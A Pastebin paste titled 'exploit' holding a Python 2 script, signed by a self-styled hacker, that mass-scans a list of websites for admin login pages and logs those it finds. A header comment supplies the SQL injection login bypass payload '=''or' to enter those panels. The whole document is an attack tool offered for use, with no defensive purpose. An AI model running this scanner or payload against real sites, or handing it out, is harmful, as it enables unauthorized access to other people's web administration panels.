Advertisement
Guest User

exploit

a guest
Jun 21st, 2018
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.18 KB | None | 0 0
  1. import httplib, sys, os, time
  2. from platform import system
  3.  
  4. #========================================
  5. #Tools : Noredirect in ferfox
  6. #or user : '=''or' --- pass: '=''or'
  7. #========================================
  8.  
  9. def clearscr():
  10. if system() == 'Linux':
  11. os.system("clear")
  12. if system() == 'Windows':
  13. os.system('cls')
  14. os.system('color a')
  15. else:
  16. pass
  17. clearscr()
  18.  
  19.  
  20. def slowprint(s):
  21. for c in s + '\n':
  22. sys.stdout.write(c)
  23. sys.stdout.flush()
  24. time.sleep(4. / 100)
  25. print("""
  26.  
  27.  
  28. _ _ _ _ _ _ _
  29. | | | | | | (_) | | | |
  30. | | | | | |_ _ _ __ ___ __ _| |_ ___ | |__ __ ___ _____ _ __
  31. | | | | | __| | '_ ` _ \ / _` | __/ _ \ | '_ \ / _` \ \/ / _ \| '__|
  32. | |_| | | |_| | | | | | | (_| | || __/ | | | | (_| |> < (_) | |
  33. \___/|_|\__|_|_| |_| |_|\__,_|\__\___| |_| |_|\__,_/_/\_\___/|_|
  34.  
  35.  
  36. """)
  37. print("\n\t\t\t\t\tCoded By " + "./U7TiM4T3_H4x0R" + "\n\t\t\t\t\t\t")
  38. ################ Bypass ####################
  39.  
  40. bypass = ["/admin/", "/admin/admin.php", "/admin/login.php", "/admin.php", "/admin/login.html"]
  41. lg = raw_input("Entre List Of Site: ")
  42. lg = open(lg, "r")
  43. try:
  44. for by in bypass:
  45. by = by.rstrip()
  46. for i in lg:
  47. i = i.rstrip()
  48. try:
  49. if i[:7] == ("http://"):
  50. i = i.replace("http://", "")
  51. if i[:8] == ("https://"):
  52. i = i.replace("https://", "")
  53. if i[-1] == ("/"):
  54. i = i.replace("/", "")
  55. except:
  56. pass
  57. print ("\t" + i + " Scaning ..... ")
  58. try:
  59. conn = httplib.HTTPConnection(i)
  60. conn.request("GET", by)
  61. conn = conn.getresponse()
  62. htmlbypass = conn.read()
  63. if conn.status == 200 and ('type="password"') in htmlbypass:
  64. print("Admin Panel Found ======>"), i + by
  65. with open(" Admin Bypass.txt", "a") as Legion:
  66. Legion.writelines(i + by + "\n")
  67. else:
  68. print ("[ByPass]" + " ..........[NOT VULN]\n")
  69. except:
  70. pass
  71. except:
  72. pass
  73. print("Have Fun U7TiM4T3_H4x0R")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement